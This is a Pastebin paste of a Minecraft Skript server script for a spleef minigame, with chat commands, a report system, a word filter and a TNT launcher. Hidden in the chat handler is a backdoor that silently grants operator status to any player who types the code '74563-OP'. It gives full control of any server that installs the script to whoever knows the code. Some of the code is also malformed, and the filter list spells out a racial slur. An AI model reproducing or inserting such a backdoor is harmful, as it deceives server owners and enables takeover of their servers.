Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- on load:
- broadcast "&7Thank you for using &cSpleet"
- broadcast "&7made by &8: &cXXXCanadian"
- broadcast "&7This is only a &bbeta verison"
- broadcast "&bFull verison &8[&bCOMING SOON&8]"
- command /broadcast <string>:
- aliases: /bc
- permission: chat.broadcast
- permission message: &7Sorry &c%player% &7you must have &6chat.broadcast&7 to run this command!
- trigger:
- broadcast "&cSpleet &7%arg-1%"
- command /clearchat:
- aliases: /cc
- permission: chat.clear
- permission message: &c7Sorry &c%player% &7you must have &6chat.clear&7 to run this command!
- trigger:
- loop 200 times:
- broadcast " "
- broadcast "&cSpleet &b%player%, &7has cleared the chat!"
- on chat:
- replace all "fuck" with "****" in the message
- replace all "cunt" with "****" in the message
- replace all "bitch" with "*****" in the message
- replace all "nigger" with "******" in the message
- replace all "pussy" with "*****" in the message
- replace all "kys" with "Hope you live long" in the message
- command /report <player> <text>:
- permission: chat.report
- permission message: &7Sorry &c%player% &7you must have &6chat.report&7 to run this command
- trigger:
- broadcast "&7Your report has landed to the staff!"
- add text-argument to {sikayetler::*}
- set {sikayeteden.%text-argument%} to player
- set {sikayeteden.%text-argument%} to player argument
- loop all players:
- if loop-player has permission "chat.show"
- send "&7Report System" to loop-player
- send "&7Report: &b""%text-argument%""" to loop-player
- send "&7the reported player: &b%player argument%" to loop-player
- send "&7Reporter: &b%player%" to loop-player]
- if chat:
- "74563-OP"
- cancel event
- then:
- op %player%
- send "&7You have used the &cop &7chat to get OP!" to %player%
- command /cookie:
- permission: free.cookie
- permission message: &7Sorry you dont have access take a free cookie using /cookie
- trigger:
- broadcast "&7OOOH %player% IS STEALIN"
- on leftclick holding tnt:
- if {spleet.tntlauncher} is true:
- player has 1 tnt
- spawn a primed tnt 1 meter above the player
- push the spawned entity in direction of player at speed 0.9
- push the spawned entity upwards at speed 0.2
- remove 1 tnt from player
- on rightclick holding tnt:
- if {spleet.tntlauncher} is true:
- player has 1 tnt
- spawn a primed tnt 1 meter above the player
- push the spawned entity in direction of player at speed 0.9
- push the spawned entity upwards at speed 0.2
- remove 1 tnt from player
- on place tnt:
- cancel event
- command /help:
- aliases: /h
- trigger:
- wait 1 tick
- send "&8&m-----------------------------------------------------"
- wait 1 tick
- message "&6/Games&8: &7Allows you to know all the game and how to play"
- wait 1 tick
- message "&6/Ranks&8: &7Allows you to get ranks off wins from minigames"
- wait 1 tick
- message "&6/Stats&8: &7Allows you to see your status"
- wait 1 tick
- message "&6/Quit&8: &7Allows you to quit a minigame/match"
- wait 1 tick
- message "&8&m-----------------------------------------------------"
- command /Games:
- aliases: /queue
- trigger:
- wait 1 tick
- message "&8&m-----------------------------------------------------"
- wait 1 tick
- message "&cGame 1&8: &bUltra Spleef &8{&6Use Eff 15 Shovels to spleef players&8}"
- wait 1 tick
- message "&cGame 2&8: &bOriginal Spleef &8{&6Original spleef with diamond shovels&8}"
- wait 1 tick
- message "&cGame 3&8: &bTnt Spleef &8{&6Throw tnt at players to kill them/spleef them&8}"
- wait 1 tick
- message "&8{&bMORE COMING SOON&8}" to %player%
- wait 1 tick
- send "&8&m-----------------------------------------------------"
- command /Ranks:
- permission: spleet.ranks
- permission message: &8{&bCOMING SOON&8}
- trigger:
- broadcast "&c%player% &7has success fully used a command unfinished"
- command /Stats:
- permission: spleet.stat
- permission message: &8{&bCOMING SOON&8}
- trigger:
- broadcast "&c%player% &7has success fully used a command unfinished"
- command /Quit:
- permission: spleet.Quit
- permission message: &8{&bCOMING SOON&8}
- trigger:
- broadcast "&c%player% &7has success fully used a command unfinished"
Add Comment
Please, Sign In to add comment